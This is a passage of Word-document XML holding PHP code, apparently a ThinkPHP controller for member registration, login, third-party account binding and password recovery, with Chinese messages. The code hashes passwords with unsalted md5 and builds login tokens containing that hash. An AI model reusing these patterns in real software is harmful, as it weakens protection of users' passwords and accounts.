          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD24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70541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BF7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6E2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3F6B8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0EF2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_codechecking($code, $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787CF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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DB8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F333D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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9C2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6C084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1B27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C6B6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433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287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($config['ban']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C21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$ban = "%**#" . $config['ban']['text'] . "%**#";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B6C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(strpos($ban, $username) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36500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6EB68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此账户系统不允许注册，请换其他账户注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A5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284F18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6AED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1775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02EA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 = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBF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(!$ip) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077330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91195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您当前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存在异常，请检测网络或重新注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6F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3A2B7E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9A5B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AA5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($config['ip']['text'] != 0 || !$config['ip']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642E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$recordsip['ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305287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$recordsip['text'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69173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$recordsip['system'] = $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DB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$recordscount = Db::name('member_records')-&gt;where($recordsip)-&gt;whereTime('time', 'today')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3493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($recordscount &gt; $config['ip']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD0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B1060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请不要频繁注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46E1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403306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86C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9A33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FC953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Db::name('member')-&gt;where($where)-&gt;fetchSql(false)-&gt;field("id,password")-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995D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64362F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 input('post.token'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7A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input('post.type');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBF2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($appid &amp;&amp; $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F87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$appidtoken = DB::name('member_band')-&gt;where(['type' =&gt; $type, 'uid' =&gt; $member['id']])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9123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($member['password'] != md5($password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61156E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E4826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密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01039F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302,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC16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E67D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5C79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(!$appidtoken) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DC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$appidmap['uid'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317614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$appidmap['type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0FFC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$appidmap['code'] = $appid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259D5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$appidmap['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67C0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$appidmapdb = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660B4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_records($member['id'], $type . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB8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$member['id'] . '|www.ffxiang.cn|' . md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E21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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA25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json(['token' =&gt; $token]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1BA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22F8BB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B445D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该用户已绑定过平台，请重新换号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3A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304,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D4A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A989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0842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0DBC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B3067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账户已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04D2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304,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631208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C9DA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CFDC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408F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$map['password'] = md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D60F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 &amp;&amp; $config['reguser']['text'] == 1) $map['user'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A239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&amp;&amp; $config['regmobile']['text'] == 1) $map['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62991D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($email &amp;&amp; $config['regemail']['text'] == 1) $map['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC39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$map['jingyan'] = $config['jingyan']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353557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($config['audit']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69ED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 = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9E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F279D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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0E9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66E9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4F1454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$map['create_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF35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$map['update_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5E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$map['create_ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B52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$map['update_ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5B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Db::name('member')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047A8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4816AF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($yaoqingma) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F0C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_yaoqing($db, $yaoqingma);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A58F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7A49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_records($db, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08708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 input('post.token'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F857A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input('post.type');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB578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($appid &amp;&amp; $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED7F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$appidtoken = DB::name('member_band')-&gt;where(['type' =&gt; $type, 'uid' =&gt; $db])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FB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(!$appidtoken) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E357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$appidmap['uid'] = $db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E4E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$appidmap['type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6976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$appidmap['code'] = $appid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1EA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$appidmap['time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA52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$appidmapdb = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C49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_records($db, $type . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB559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 . '|www.ffxiang.cn|' . $map['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38A5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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271ECE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['token' =&gt; $token];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDE5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38790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16F474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该用户已绑定过平台，请重新换号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2028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304,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB39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8D8F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BE4A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42B6B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10B990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注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4A6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CE2D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C49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C5B18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4DC88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注册失败，请检测</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214800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62480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D39F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87F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68A4B3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199ED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json(_ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933FD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9797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8CEF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password()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAC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AE6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Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC69C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576921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773BFD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$config[$v['name']]['name'] = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538358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$config[$v['name']]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D654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$config[$v['name']]['content'] = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971A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$config[$v['name']]['text'] = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475460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F9D7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$this-&gt;assign('config', $config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBD0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7F0B1B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(!$config['switch']['text'] || $config['switch']['text'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B11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17F2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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374CB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164823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8D01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7511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&amp;&amp; !$config['regemail']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A1F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D0DCF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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D45B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6EC675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908D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A2B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(Request::instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD9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input('username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA3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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E90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(!$username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E392B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257F9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号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414E0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FF5F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4B8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F3DD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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FE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48E1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请输入设置密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52B0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138AF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C3C7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D16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($config['pwdcode']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034C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$captcha = input('captcha') ? input('captcha') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6D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(!$captcha) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50205E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4C458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请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E9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2EC0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B9B7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B5C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(!captcha_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2D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B750A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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C0A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52D05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DDC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828D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8A11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$mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF8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($config['regmobile']['text'] == 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167995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$mobile = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A80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$where['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0E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($config['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392B0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$email = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86E3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$where['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC105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A0087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16BD5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账户格式不对，不可填写特殊字符，请重新填写账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7D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8FA12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B76D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FFC4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(!$email &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E97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EB770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未开放注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AC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106D2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D5EF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472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 $email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564C7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 input('code') ? input('code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46455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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC2F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676899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32DEF4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手机验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4386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F78C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1E2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($email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81CF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2DF0F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邮箱验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AA9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29CA73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BD28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1C3AE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3B06FE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请填写验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16693C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5E4433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7C80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6D9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60910F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1D7C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_codechecking($code, $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C10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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E99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521F0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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62112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46F5E0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A091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F08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8762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Db::name('member')-&gt;where($where)-&gt;fetchSql(false)-&gt;field("id,hide")-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE2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5B67A4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2182D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用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649321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'errcode' =&gt; 221,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86D3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6918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DD8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6C8C0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536A99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无法使用密码找回，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9531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65A34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346DC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无法使用密码找回，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090DF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20E806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44F2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2896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01B4C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1255F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无法使用密码找回，原因是账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1BE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262800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7AC55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无法使用密码找回，原因是账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FB7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622FDF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A590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A71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16BA1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292E2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无法使用密码找回，原因是账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B8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20D18E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259D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无法使用密码找回，原因是账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34C2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622077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9725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83B2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657FB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603C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$map['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D1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($email) $map['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253EBC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Db::name('member')-&gt;where($map)-&gt;setField('password', md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5AD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A6E9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密码找回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1F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密码修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027A8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C7F4B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6A8C6F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密码修改失败，请检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A38A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503F7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40CE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4303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6F1B9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2617F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json(_ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416253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29A2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C4DC1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oauth()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCB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9353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input('type') ? input('type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED79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$openid = input('openid') ? input('openid') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D51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 input('nickname') ? input('nickname') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FDC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input('img') ? input('img') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A7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input('info') ? input('info') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794251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input('username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038B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1A7FEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'in:wxapp,qqapp,wbapp|require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39228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'openid' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F40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=&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33040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=&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C98F1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=&gt; 'require',</w:t>
      </w:r>
    </w:p>
